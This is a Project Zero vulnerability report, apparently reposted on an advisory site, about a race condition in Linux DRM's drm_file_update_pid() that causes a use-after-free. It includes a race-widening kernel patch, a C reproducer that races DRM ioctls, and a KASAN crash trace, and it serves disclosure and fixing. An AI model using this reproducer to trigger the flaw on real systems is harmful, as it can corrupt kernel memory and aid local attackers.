Linux DRM drm_file_update_pid() Race Condition / Use-After-Free

2024.08.06
Credit: Jann Horn
Risk: High
Local: Yes
Remote: No
CWE: CWE-362

Linux: DRM: refcount incremented too late in drm_file_update_pid()

[I am sending this to security@ and to the drm-misc maintainers - based on https://drm.pages.freedesktop.org/maintainer-tools/committer-drm-misc.html#merge-criteria I think this falls into drm-misc's area of responsibility?]

=== summary ===

drm_file_update_pid() calls get_pid() too late, which creates a race condition that can lead to use-after-free of a `struct pid`.

I will send a suggested patch off-list in a minute; let me know if you want me to resend it on the dri-devel list in case that works better for you.

=== verbose bug report ===

drm_file_update_pid() contains the following code:

```
	struct drm_device *dev;
	struct pid *pid, *old;

	/*
	 * Master nodes need to keep the original ownership in order for
	 * drm_master_check_perm to keep working correctly. (See comment in
	 * drm_auth.c.)
	 */
	if (filp->was_master)
		return;

	pid = task_tgid(current);
	[...]
	dev = filp->minor->dev;
	mutex_lock(&dev->filelist_mutex);
	old = rcu_replace_pointer(filp->pid, pid, 1);
	mutex_unlock(&dev->filelist_mutex);

	if (pid != old) {
		get_pid(pid);
		synchronize_rcu();
		put_pid(old);
	}
```

filp->pid is a refcounted pointer which can only be modified under dev->filelist_mutex. After calling rcu_replace_pointer(), we have a refcount debt of 1, which is still fine because we're holding the mutex that prevents other tasks from taking ownership of the reference stored in filp->pid; but by the time we drop this mutex, we must have called get_pid() to make up for this refcount debt, and that isn't done.
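The ordering requirement described above can be illustrated with a small userspace model. This is only a sketch under stated assumptions, not the kernel patch: `toy_pid`, `toy_file`, `toy_get`, `toy_put` and `toy_update_pid` are hypothetical stand-ins for `struct pid`, `struct drm_file` plus `dev->filelist_mutex`, `get_pid()`, `put_pid()` and `drm_file_update_pid()`. The point it shows is that the reference the slot will own is taken before the lock is dropped.

```c
#include <assert.h>
#include <pthread.h>
#include <stdatomic.h>

/* Hypothetical stand-in for struct pid: only an atomic reference count. */
struct toy_pid {
	atomic_int refcount;
};

/* Hypothetical stand-in for struct drm_file plus dev->filelist_mutex. */
struct toy_file {
	pthread_mutex_t lock;
	struct toy_pid *pid;	/* the slot owns one reference on *pid */
};

static void toy_get(struct toy_pid *p)
{
	atomic_fetch_add(&p->refcount, 1);
}

/* Returns 1 if this call dropped the last reference. */
static int toy_put(struct toy_pid *p)
{
	return atomic_fetch_sub(&p->refcount, 1) == 1;
}

/*
 * Publish `pid` in the slot. The slot's reference is taken while the lock
 * is still held, so no other task can take over (and drop) a reference
 * that does not exist yet. The previous owner is returned; the caller
 * inherits the slot's old reference and must drop it with toy_put().
 */
static struct toy_pid *toy_update_pid(struct toy_file *f, struct toy_pid *pid)
{
	struct toy_pid *old;

	pthread_mutex_lock(&f->lock);
	toy_get(pid);		/* repay the refcount debt before unlocking */
	old = f->pid;
	f->pid = pid;
	pthread_mutex_unlock(&f->lock);

	/* In the kernel, synchronize_rcu() would run here, before the put. */
	return old;
}
```

If `pid` is already the stored owner, the get inside the lock and the caller's later put cancel out, so this model needs no `pid != old` special case.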
So a use-after-free can occur in the following scenario, assuming filp->pid initially points to the pid of process A and process B's initial pid refcount is 1:

process A                                    process B
=========                                    =========
                                             begin drm_file_update_pid
                                             mutex_lock(&dev->filelist_mutex)
                                             rcu_replace_pointer(filp->pid, <pid B>, 1)
                                             mutex_unlock(&dev->filelist_mutex)
begin drm_file_update_pid
mutex_lock(&dev->filelist_mutex)
rcu_replace_pointer(filp->pid, <pid A>, 1)
mutex_unlock(&dev->filelist_mutex)
get_pid(<pid A>)
synchronize_rcu()
put_pid(<pid B>)
  *** pid B reaches refcount 0 and is freed here ***
                                             get_pid(<pid B>)   *** UAF ***
                                             synchronize_rcu()
                                             put_pid(<pid A>)

Note that this race can only occur if RCU is configured so that running in preemptible task context can count as an RCU quiescent state. My testcase assumes that the kernel is configured for full preemption (meaning either CONFIG_PREEMPT=y or CONFIG_PREEMPT_DYNAMIC=y with full preemption selected at boot time); however, I think in theory the bug can probably be hit as long as CONFIG_PREEMPT_RCU=y is enabled (which is the case on kernel builds with dynamic preemption), since I think on such builds, expedited grace periods can still detect RCU quiescent states with IPIs.
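The interleaving above can be replayed deterministically on a single thread with toy reference counts. The following is a hedged userspace sketch, not kernel code: `toy_pid`, `toy_get`, `toy_put` and `replay` are hypothetical names, pid A's starting count of 2 (one reference for the task, one for filp->pid) is an assumption, and pid B's starting count of 1 is taken from the scenario.

```c
#include <assert.h>
#include <stdbool.h>

/* Hypothetical toy pid: a count plus a flag set when the count hits zero. */
struct toy_pid {
	int refcount;
	bool freed;
};

static void toy_put(struct toy_pid *p)
{
	if (--p->refcount == 0)
		p->freed = true;	/* the kernel would free the object here */
}

/* Returns true if the object was already freed, i.e. a use-after-free. */
static bool toy_get(struct toy_pid *p)
{
	if (p->freed)
		return true;
	p->refcount++;
	return false;
}

/*
 * Replay the two-process interleaving on one thread.
 * get_before_unlock == false: the get happens after the unlock, as reported.
 * get_before_unlock == true:  the get happens inside the locked section.
 * Returns true if any get touched a freed pid.
 */
static bool replay(bool get_before_unlock)
{
	struct toy_pid a = { 2, false };	/* assumption: task ref + filp->pid ref */
	struct toy_pid b = { 1, false };	/* from the scenario: refcount 1 */
	struct toy_pid *slot = &a;		/* models filp->pid */
	struct toy_pid *old_a, *old_b;
	bool uaf = false;

	/* Process B: locked section, then it is delayed. */
	if (get_before_unlock)
		uaf |= toy_get(&b);
	old_b = slot;
	slot = &b;

	/* Process A: locked section, then the rest of the function. */
	if (get_before_unlock)
		uaf |= toy_get(&a);
	old_a = slot;
	slot = &a;
	if (!get_before_unlock)
		uaf |= toy_get(&a);
	toy_put(old_a);			/* drops a reference on pid B */

	/* Process B resumes. */
	if (!get_before_unlock)
		uaf |= toy_get(&b);
	toy_put(old_b);			/* drops a reference on pid A */

	return uaf;
}
```

Calling `replay(false)` reports the use-after-free on pid B, while `replay(true)` completes without touching a freed object, because pid B's count never drops to zero while process B still owes a reference.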
My reproducer also requires that you patch the following code into the kernel to slow down execution and make the bug easy to trigger:

```
diff --git a/drivers/gpu/drm/drm_file.c b/drivers/gpu/drm/drm_file.c
index 638ffa4444f5..03e7711e9744 100644
--- a/drivers/gpu/drm/drm_file.c
+++ b/drivers/gpu/drm/drm_file.c
@@ -38,6 +38,7 @@
 #include <linux/pci.h>
 #include <linux/poll.h>
 #include <linux/slab.h>
+#include <linux/delay.h>
 
 #include <drm/drm_client.h>
 #include <drm/drm_drv.h>
@@ -472,6 +473,12 @@ void drm_file_update_pid(struct drm_file *filp)
 	old = rcu_replace_pointer(filp->pid, pid, 1);
 	mutex_unlock(&dev->filelist_mutex);
 
+	if (strcmp(current->comm, "SLOWME") == 0) {
+		pr_warn("%s: BEGIN DELAY\n", __func__);
+		mdelay(1000);
+		pr_warn("%s: END DELAY\n", __func__);
+	}
+
 	if (pid != old) {
 		get_pid(pid);
 		synchronize_rcu();
```

The reproducer code:

```
#include <unistd.h>
#include <stdio.h>
#include <err.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/signal.h>
#include <sys/ioctl.h>
#include <sys/prctl.h>
#include <sys/wait.h>
#include <drm/drm.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

static void main_test_code() {
  struct drm_version dummy_version;
  int drm_fd = SYSCHK(open("/dev/dri/renderD128", O_RDONLY));
  int child = SYSCHK(fork());
  if (child == 0) { /* child process */
    prctl(PR_SET_NAME, "SLOWME");
    ioctl(drm_fd, DRM_IOCTL_VERSION, &dummy_version); // delay injected here
  } else { /* parent process */
    usleep(200*1000);
    ioctl(drm_fd, DRM_IOCTL_VERSION, &dummy_version);
  }

  if (child == 0) { /* child process */
    exit(0);
  } else { /* parent process */
    int status = 0;
    pid_t child = wait(&status);
    printf("wait() returned %d, status %d\n", child, status);
    exit(0);
  }
}

int main(void) {
  // run in a child process to avoid extra references from job control or such
  int child = SYSCHK(fork());
  if (child == 0) {
    prctl(PR_SET_PDEATHSIG, SIGKILL);
    main_test_code();
  } else {
    int status = 0;
    pid_t child = wait(&status);
    printf("wait() returned %d, status %d\n", child, status);
  }
}
```

The resulting KASAN splat (tested on mainline plus the race widener patch above, with CONFIG_PREEMPT=y and CONFIG_KASAN=y):

```
==================================================================
BUG: KASAN: slab-use-after-free in drm_file_update_pid (./arch/x86/include/asm/atomic.h:93 (discriminator 4) ./include/linux/atomic/atomic-arch-fallback.h:749 (discriminator 4) ./include/linux/atomic/atomic-instrumented.h:253 (discriminator 4) ./include/linux/refcount.h:184 (discriminator 4) ./include/linux/refcount.h:241 (discriminator 4) ./include/linux/refcount.h:258 (discriminator 4) ./include/linux/pid.h:84 (discriminator 4) ./include/linux/pid.h:81 (discriminator 4) drivers/gpu/drm/drm_file.c:483 (discriminator 4))
Write of size 4 at addr ffff88811f2f68c0 by task SLOWME/1092

CPU: 3 PID: 1092 Comm: SLOWME Not tainted 6.10.0-rc5-00035-gafcd48134c58-dirty #384
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
Call Trace:
 <TASK>
dump_stack_lvl (lib/dump_stack.c:117)
print_report (mm/kasan/report.c:378 mm/kasan/report.c:488)
kasan_report (mm/kasan/report.c:603)
kasan_check_range (mm/kasan/generic.c:175 (discriminator 1) mm/kasan/generic.c:189 (discriminator 1))
drm_file_update_pid (./arch/x86/include/asm/atomic.h:93 (discriminator 4) ./include/linux/atomic/atomic-arch-fallback.h:749 (discriminator 4) ./include/linux/atomic/atomic-instrumented.h:253 (discriminator 4) ./include/linux/refcount.h:184 (discriminator 4) ./include/linux/refcount.h:241 (discriminator 4) ./include/linux/refcount.h:258 (discriminator 4) ./include/linux/pid.h:84 (discriminator 4) ./include/linux/pid.h:81 (discriminator 4) drivers/gpu/drm/drm_file.c:483 (discriminator 4))
drm_ioctl_kernel (./include/drm/drm_drv.h:510 drivers/gpu/drm/drm_ioctl.c:737)
drm_ioctl (drivers/gpu/drm/drm_ioctl.c:842)
__x64_sys_ioctl (fs/ioctl.c:51 fs/ioctl.c:912 fs/ioctl.c:898 fs/ioctl.c:898)
do_syscall_64 (arch/x86/entry/common.c:52 (discriminator 1) arch/x86/entry/common.c:83 (discriminator 1))
entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)
[...]
 </TASK>

Allocated by task 1091:
kasan_save_stack (mm/kasan/common.c:48)
kasan_save_track (./arch/x86/include/asm/current.h:49 (discriminator 1) mm/kasan/common.c:60 (discriminator 1) mm/kasan/common.c:69 (discriminator 1))
__kasan_slab_alloc (mm/kasan/common.c:312 mm/kasan/common.c:338)
kmem_cache_alloc_noprof (./include/linux/kasan.h:201 mm/slub.c:3940 mm/slub.c:4002 mm/slub.c:4009)
alloc_pid (kernel/pid.c:187)
copy_process (kernel/fork.c:2406)
kernel_clone (./include/linux/random.h:26 kernel/fork.c:2798)
__do_sys_clone (kernel/fork.c:2929)
do_syscall_64 (arch/x86/entry/common.c:52 (discriminator 1) arch/x86/entry/common.c:83 (discriminator 1))
entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)

Freed by task 1091:
kasan_save_stack (mm/kasan/common.c:48)
kasan_save_track (./arch/x86/include/asm/current.h:49 (discriminator 1) mm/kasan/common.c:60 (discriminator 1) mm/kasan/common.c:69 (discriminator 1))
kasan_save_free_info (mm/kasan/generic.c:582 (discriminator 1))
poison_slab_object (mm/kasan/common.c:242)
__kasan_slab_free (mm/kasan/common.c:256 (discriminator 1))
kmem_cache_free (mm/slub.c:4438 (discriminator 3) mm/slub.c:4513 (discriminator 3))
put_pid.part.0 (kernel/pid.c:122)
drm_ioctl_kernel (./include/drm/drm_drv.h:510 drivers/gpu/drm/drm_ioctl.c:737)
drm_ioctl (drivers/gpu/drm/drm_ioctl.c:842)
__x64_sys_ioctl (fs/ioctl.c:51 fs/ioctl.c:912 fs/ioctl.c:898 fs/ioctl.c:898)
do_syscall_64 (arch/x86/entry/common.c:52 (discriminator 1) arch/x86/entry/common.c:83 (discriminator 1))
entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)

The buggy address belongs to the object at ffff88811f2f68c0
 which belongs to the cache pid of size 240
The buggy address is located 0 bytes inside of
 freed 240-byte region [ffff88811f2f68c0, ffff88811f2f69b0)

The buggy address belongs to the physical page:
page: refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x11f2f6
head: order:1 mapcount:0 entire_mapcount:0 nr_pages_mapped:0 pincount:0
flags: 0x200000000000040(head|node=0|zone=2)
page_type: 0xffffefff(slab)
raw: 0200000000000040 ffff888106686a00 dead000000000122 0000000000000000
raw: 0000000000000000 0000000080190019 00000001ffffefff 0000000000000000
head: 0200000000000040 ffff888106686a00 dead000000000122 0000000000000000
head: 0000000000000000 0000000080190019 00000001ffffefff 0000000000000000
head: 0200000000000001 ffffea00047cbd81 ffffffffffffffff 0000000000000000
head: 0000000000000002 0000000000000000 00000000ffffffff 0000000000000000
page dumped because: kasan: bad access detected

Memory state around the buggy address:
 ffff88811f2f6780: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
 ffff88811f2f6800: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fc fc
>ffff88811f2f6880: fc fc fc fc fc fc fc fc fa fb fb fb fb fb fb fb
                                           ^
 ffff88811f2f6900: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
 ffff88811f2f6980: fb fb fb fb fb fb fc fc fc fc fc fc fc fc fc fc
==================================================================
```

=== disclosure deadline ===

This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2024-09-25.

For more details, see the Project Zero vulnerability disclosure policy: https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.html

Related CVE Numbers: CVE-2024-39486.

Found by: jannh@google.com

